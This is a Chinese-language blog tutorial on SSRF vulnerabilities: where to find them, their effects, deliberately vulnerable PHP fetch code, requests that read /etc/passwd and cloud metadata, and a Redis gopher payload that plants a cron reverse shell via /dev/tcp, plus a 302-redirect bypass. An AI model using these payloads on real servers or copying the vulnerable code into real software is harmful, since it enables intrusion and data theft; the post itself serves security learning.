Virtua1's blog

浅谈SSRF漏洞--基础篇

字数统计: 1.7k阅读时长: 7 min
2019/03/16 Share

漏洞简介

SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统)

SSRF 形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。比如从指定URL地址获取网页文本内容,加载指定地址的图片,下载等等。

注释:除了http/https等方式可以造成ssrf,类似tcp connect 方式也可以探测内网一些ip 的端口是否开发服务,只不过危害比较小而已。

漏洞挖掘

1.社交分享功能:获取超链接的标题等内容进行显示

2.转码服务:通过URL地址把原地址的网页内容调优使其适合手机屏幕浏览

3.在线翻译:给网址翻译对应网页的内容

4.图片加载/下载:例如富文本编辑器中的点击下载图片到本地;通过URL地址加载或下载图片

5.图片/文章收藏功能:主要其会取URL地址中title以及文本的内容作为显示以求一个好的用具体验

6.云服务厂商:它会远程执行一些命令来判断网站是否存活等,所以如果可以捕获相应的信息,就可以进行ssrf测试

7.网站采集,网站抓取的地方:一些网站会针对你输入的url进行一些信息采集工作

8.数据库内置功能:数据库的比如mongodb的copyDatabase函数

9.邮件系统:比如接收邮件服务器地址

10.编码处理, 属性信息处理,文件处理:比如ffpmg,ImageMagick,docx,pdf,xml处理器等

11.未公开的api实现以及其他扩展调用URL的功能:可以利用google 语法加上这些关键字去寻找SSRF漏洞

一些的url中的关键字:share、wap、url、link、src、source、target、u、3g、display、sourceURl、imageURL、domain……

12.从远程服务器请求资源(upload from url 如discuz!;import & expost rss feed 如web blog;使用了xml引擎对象的地方 如wordpress xmlrpc.php)

漏洞利用

攻击效果

1.可以对外网、服务器所在内网、本地进行端口扫描,获取一些服务的banner信息;

2.攻击运行在内网或本地的应用程序(比如溢出);

3.对内网web应用进行指纹识别,通过访问默认文件实现;

4.攻击内外网的web应用,主要是使用get参数就可以实现的攻击(比如struts2,sqli等);

5.利用file协议读取本地文件等。

利用方式

ssrf攻击可能存在任何语言编写的应用,这里以php为例来分析。

1
<?php
2
if (isset($_GET['url'])){
3
$url = $_GET['url'];
4
5
$image = fopen($url, 'rb');
6
header("Content-Type: image/png");
7
fpassthru($image);
8
}

这是一段非常简单的代码,用在后端常用作远程加载图片,$url是我们可控的,但是没有对传入的url进行任何过滤,导致我们可以有很多种攻击方式:

1
GET /?url =file:///etc/passwd
2
GET /?url=dict://localhost:22/info
3
GET /?url=http://192.168.164.131/latest/meta-data/

这里读取我们用的是fpassthru函数,同时file_get_contents()、curl()、fsocksopen()均可能造成SSRF漏洞。

1
<?php
2
if (isset($_POST['url'])) 
3
{ 
4
$content = file_get_contents($_POST['url']); 
5
$filename ='./images/'.rand().';img1.jpg'; 
6
file_put_contents($filename, $content); 
7
echo $_POST['url']; 
8
$img = "<img src=\"".$filename."\"/>"; 
9
} 
10
echo $img; 
11
?>
1
<?php 
2
if (isset($_POST['url']))
3
{
4
$link = $_POST['url'];
5
$curlobj = curl_init();
6
curl_setopt($curlobj, CURLOPT_POST, 0);
7
curl_setopt($curlobj,CURLOPT_URL,$link);
8
curl_setopt($curlobj, CURLOPT_RETURNTRANSFER, 1);
9
$result=curl_exec($curlobj);
10
curl_close($curlobj);
11
12
$filename = './curled/'.rand().'.txt';
13
file_put_contents($filename, $result); 
14
echo $result;
15
}
16
?>

漏洞分析

先看下curl支持的协议:

1
curl 7.58.0 (x86_64-pc-linux-gnu) libcurl/7.58.0 OpenSSL/1.1.0g zlib/1.2.11 libidn2/2.0.4 libpsl/0.19.1 (+libidn2/2.0.4) nghttp2/1.30.0 librtmp/2.3
2
Release-Date: 2018-01-24
3
4
Protocols: dict file ftp ftps gopher http https imap imaps ldap ldaps pop3 pop3s rtmp rtsp smb smbs smtp smtps telnet tftp 
5
6
Features: AsynchDNS IDN IPv6 Largefile GSS-API Kerberos SPNEGO NTLM NTLM_WB SSL libz TLS-SRP HTTP2 UnixSockets HTTPS-proxy PSL

看以看到支持的协议非常多,ssrf中常用的协议有:http、gopher、https、dict、file.

本地利用

1
# 利用file协议查看文件:
2
3
curl -v 'file:///etc/passwd' 
4
5
# 利用dict探测端口:
6
7
curl -v 'dict://127.0.0.1:22' 
8
curl -v 'dict://127.0.0.1:6379/info' 
9
10
# 利用gopher协议反弹shell:
11
12
curl -v 'gopher://127.0.0.1:6379/_*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$57%0d%0a%0a%0a%0a*/1 * * * * bash -i >& /dev/tcp/127.0.0.1/2333 0>&1%0a%0a%0a%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$16%0d%0a/var/spool/cron/%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$4%0d%0aroot%0d%0a*1%0d%0a$4%0d%0asave%0d%0a*1%0d%0a$4%0d%0aquit%0d%0a'

远程应用

代码
1
<?php 
2
$ch = curl_init(); 
3
curl_setopt($ch, CURLOPT_URL, $_GET['url']); 
4
curl_setopt($ch, CURLOPT_HEADER, 0); 
5
curl_exec($ch); 
6
curl_close($ch); 
7
?>
1
# 利用file协议任意文件读取:
2
3
curl -v 'http://192.168.164.130/ssrf.php?url=file:///etc/passwd' 
4
5
# 利用dict协议查看端口:
6
7
curl -v 'http://192.168.164.130/ssrf.php?url=dict://127.0.0.1:22' 
8
9
# 利用gopher协议反弹shell:
10
11
curl -v 'http://192.168.164.130/ssrf.php?url=gopher%3A%2F%2F127.0.0.1%3A6379%2F_%2A3%250d%250a%243%250d%250aset%250d%250a%241%250d%250a1%250d%250a%2456%250d%250a%250d%250a%250a%250a%2A%2F1%20%2A%20%2A%20%2A%20%2A%20bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F127.0.0.1%2F2333%200%3E%261%250a%250a%250a%250d%250a%250d%250a%250d%250a%2A4%250d%250a%246%250d%250aconfig%250d%250a%243%250d%250aset%250d%250a%243%250d%250adir%250d%250a%2416%250d%250a%2Fvar%2Fspool%2Fcron%2F%250d%250a%2A4%250d%250a%246%250d%250aconfig%250d%250a%243%250d%250aset%250d%250a%2410%250d%250adbfilename%250d%250a%244%250d%250aroot%250d%250a%2A1%250d%250a%244%250d%250asave%250d%250a%2A1%250d%250a%244%250d%250aquit%250d%250a'
代码
1
<?php
2
function curl($url){
3
$ch = curl_init();
4
curl_setopt($ch, CURLOPT_URL, $url);
5
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, True);
6
curl_setopt($ch, CURLOPT_PROTOCOLS, CURLPROTO_HTTP | CURLPROTO_HTTPS);
7
curl_setopt($ch, CURLOPT_HEADER, 0);
8
curl_exec($ch);
9
curl_close($ch);
10
}
11
12
$url = $_GET['url'];
13
curl($url);
14
?>
  • 限制协议为HTTP、HTTPS
  • 设置跳转重定向为True(默认不跳转)

此时限制了协议导致无法利用dict协议,但是可以利用302跳转绕过:
302.php

1
<?php
2
header("Location: dict://192.168.164.130:22/info");

同样也可以利用跳转来利用file等协议。

参考

https://joychou.org/web/phpssrf.html
https://www.anquanke.com/post/id/145519#h2-1

CATALOG
  1. 1. 漏洞简介
  2. 2. 漏洞挖掘
  3. 3. 漏洞利用
    1. 3.1. 攻击效果
    2. 3.2. 利用方式
    3. 3.3. 漏洞分析
    4. 3.4. 本地利用
    5. 3.5. 远程应用
      1. 3.5.1. 代码
      2. 3.5.2. 代码
  4. 4. 参考